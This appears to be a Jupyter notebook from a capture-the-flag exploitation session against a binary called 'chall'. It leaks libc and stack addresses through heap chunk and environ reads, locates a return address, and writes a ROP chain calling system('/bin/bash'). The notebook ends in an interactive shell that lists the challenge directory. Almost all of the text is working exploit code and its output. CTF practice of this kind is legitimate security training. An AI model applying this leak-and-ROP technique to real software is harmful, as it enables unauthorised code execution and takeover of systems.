In [1]:
cur = c1
while cur.addr != 0:
  print(cur.addr, pwn.mem.read_nu64(cur.addr -16, 10))
  if input().find('1') == -1: break
  #cur.addr+=(cur.size&~1)
  cur = cur.prev_free
  print()


94733611752880 (0, 529, 94733611751712, 139648518867712, 0, 0, 0, 0, 0, 0)



In [2]:
print(hex(arena_addr))

0x7f7cb9a30aa0


In [2]:
import chdrft.emu.bin_analysis as bin_analysis
import chdrft.utils.misc as cmisc

import imp
from chdrft.emu.elf import ElfUtils
import chdrft.emu.elf as celf

celf = imp.reload(celf)
binary = './chall'
elf = celf.ElfUtils(binary)

libc = celf.ElfUtils('/lib/libc.so.6')

SETTING m32 False
SETTING m32 True
SETTING m32 None


In [3]:
libc.offset = arena_addr - libc.get_symbol('main_arena')


In [4]:
environ_stack = pwn.mem.read_ptr(libc.get_symbol('environ'))
print(pwn.mem.xxd(environ_stack-0x30, 0x100))

def find_stack_top_from_environ(pwn, environ_stack_addr):
  import itertools
  cur = environ_stack_addr - 8 -8
  for argc in itertools.count():
    if pwn.mem.read_ptr(cur) == argc:
      break
    cur -= 8
  return cur
    
first_call_rsp = find_stack_top_from_environ(pwn, environ_stack) - 2*8 # two pushes before first call
chall_first_ret = pwn.mem.read_ptr(first_call_rsp - 8)

elf.offset = chall_first_ret - (elf.get_symbol('_start') + 0x2a)


00000000: 00005628e1cb612a 00007ffdcf1a6848 000000000000001c 0000000000000001  *a..(V..Hh......................
00000020: 00007ffdcf1a7328 0000000000000000 00007ffdcf1a7330 00007ffdcf1a7912  (s..............0s.......y......
00000040: 00007ffdcf1a7968 00007ffdcf1a797b 00007ffdcf1a7999 00007ffdcf1a79ce  hy......{y.......y.......y......
00000060: 00007ffdcf1a79df 00007ffdcf1a7a0c 00007ffdcf1a7a17 00007ffdcf1a7a33  .y.......z.......z......3z......
00000080: 00007ffdcf1a7a56 00007ffdcf1a7a62 00007ffdcf1a7a91 00007ffdcf1a7ab7  Vz......bz.......z.......z......
000000a0: 00007ffdcf1a7ac2 00007ffdcf1a7ade 00007ffdcf1a7afd 00007ffdcf1a7b0c  .z.......z.......z.......{......
000000c0: 00007ffdcf1a7b32 00007ffdcf1a7b6c 00007ffdcf1a7b95 00007ffdcf1a7ba4  2{......l{.......{.......{......
000000e0: 00007ffdcf1a7baf 00007ffdcf1a7bdd 00007ffdcf1a7c00 00007ffdcf1a7c1b  .{.......{.......|.......|......
00000100:  



In [5]:
assert elf.get_range(elf.get_entry_address(), n=0x20) == pwn.mem.read(elf.get_entry_address(), 0x20)

In [6]:
data = bin_analysis.r2_extract_all(binary, elf.offset)
bh = bin_analysis.BinHelper(binary, data)

In [8]:
menu_ret = cmisc.get_uniq(data.f['sym.menu'].codexrefs_funcs['main']).addr  + 5
rsp_target = first_call_rsp - 8

import itertools
for i in itertools.count():
  rsp_target -= 8
  if pwn.mem.read_ptr(rsp_target) == menu_ret:
    break
ret_addr = rsp_target


In [9]:
from chdrft.emu.base import Stack
stack = Stack(None, pwn.mem, pwn.mem.arch, fixed_sp = ret_addr)


In [11]:
system_addr = libc.get_dyn_symbol('system')
sx = b'/bin/bash\x00'
set_sp_gadget = 0x00000000000019cd
rdi_gadget= 0x19d3 + elf.offset
buf_addr = stack.sp + 0x40
print('SYSTEMLIBC >> ', hex(system_addr))
print('SP >> ', hex(stack.sp))

SYSTEMLIBC >>  0x7f027444b380
SP >>  0x7ffdcf1a6758


In [12]:
stack.set(0, rdi_gadget)
stack.set(1, buf_addr)
stack.set(2, system_addr)

pwn.mem.write(buf_addr, sx)

In [13]:
c.quit()


In [14]:
c.conn.interactive()


Starting interactive mode >> 
 >> ls
a.out
chall
chdrft.cache
chdrft.cache.bak
control.tar.gz
core.19415
core.19508
core.19513
core.24296
core.25439
core.25442
core.27908
core.28854
core.29758
core.29762
core.30185
core.30349
core.3520
core.6104
core.6672
core.6742
core.6765
core.6772
core.6856
core.6862
core.7061
core.7179
core.7273
core.7442
core.7611
core.8682
core.8688
data.tar.xz
debian-binary
dump.mem
dump.out
etc
kernel_jup.py
lib
lib64
libc.so.6
main.py
__pycache__
test.c
Untitled16.html
Untitled16.ipynb
Untitled16.py
usr


KeyboardInterrupt: 